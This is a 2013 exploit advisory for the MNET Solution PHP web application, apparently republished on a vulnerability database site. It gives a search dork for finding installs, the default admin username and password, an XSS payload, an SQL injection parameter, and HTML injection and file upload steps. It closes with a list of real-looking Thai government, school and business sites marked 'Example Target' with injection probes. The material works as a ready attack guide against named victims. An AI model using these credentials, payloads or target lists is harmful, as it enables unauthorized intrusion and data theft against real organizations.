`#Title : MNET Solution Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 10/19/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://mnet.co.th
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : XSS, SQL Injection, HTML Injection, Arbitrary File Upload
#Dork : inurl:webboard.php?option=answers
Default Admin Password
http://site-target/siteadmin/
Username : superadmin
Password : jocho
====================================================================================================
Cross Site Scripting
http://site-target/[PATH]/subindex.php?page=search&kword=[XSS]
Example at Web Vendor
http://mnet.co.th/2012/th/main/subindex.php?page=search&kword=<script>alert('DevilScreaM')</script>
====================================================================================================
SQL Injection Vulnerability
Vulnerable at 'webboard.php'
http://site-target/[PATH]/webboard.php?option=answers&qNo=[SQLI]
====================================================================================================
HTML Injection
Register to WebBoard, after Register, Create New Post
Go to http://site-target/[PATH]/webboard.php?#post
#NOTE
Register Page : http://site-target/subindex.php?page=member&task=new
====================================================================================================
Arbitrary File Upload
1. Login to Page Admin
2. After Login, go to http://site-target/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
3. Click Upload, And Upload Your HTML
4. Result Upload at
http://site-target/upfile/[YOURFILE].html
http://site-target/images/[YOURFILE].html
======================================================================================================
Example Target
http://tarbiah.ac.th/main/webboard.php?option=answers&qNo=20'
http://pasayyawo.go.th/main/webboard.php?option=answers&qNo=9'
http://anwarulislam.ac.th/main/webboard.php?option=answers&qNo=10'
http://pujud.go.th/main/webboard.php?option=answers&qNo=20'
http://npm.ac.th/en/webboard.php?option=answers&qNo=3'
http://klongchanak.go.th/2011/main/webboard.php?option=answers&qNo=20'
http://alfatihah.ac.th/main/webboard.php?option=answers&qNo=20'
http://halal.or.th/th/main/webboard.php?option=answers&qNo=20'
http://kpgt.co.th/en/main/webboard.php?option=answers&qNo=20'
http://startec.co.th/main/webboard.php?option=answers&qNo=13'
http://worldwidestudy.co.th/main/webboard.php?option=answers&qNo=4'
http://mrhalalfood.co.th/th/main/webboard.php?option=answers&qNo=1'
http://royalthaitour.com/ar/main/webboard.php?option=answers&qNo=2'
http://prosperfilms.com/en/main/webboard.php?option=answers&qNo=8'
http://halalscience.org/en/main/webboard.php?option=answers&qNo=2'
http://satelliteguidemag.com/main/webboard.php?option=answers&qNo=13'
http://jintakanitlanna.com/main/webboard.php?option=answers&qNo=63'
http://muslimchonburi.com/2011/main/webboard.php?option=answers&qNo=23'
http://fulfilacademy.com/main/webboard.php?option=answers&qNo=43'
http://st-arabian.com/main/webboard.php?option=answers&qNo=43'
http://thaipaki.com/main/webboard.php?option=answers&qNo=47'
http://ben-socks.com/th/main/webboard.php?option=answers&qNo=23'
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation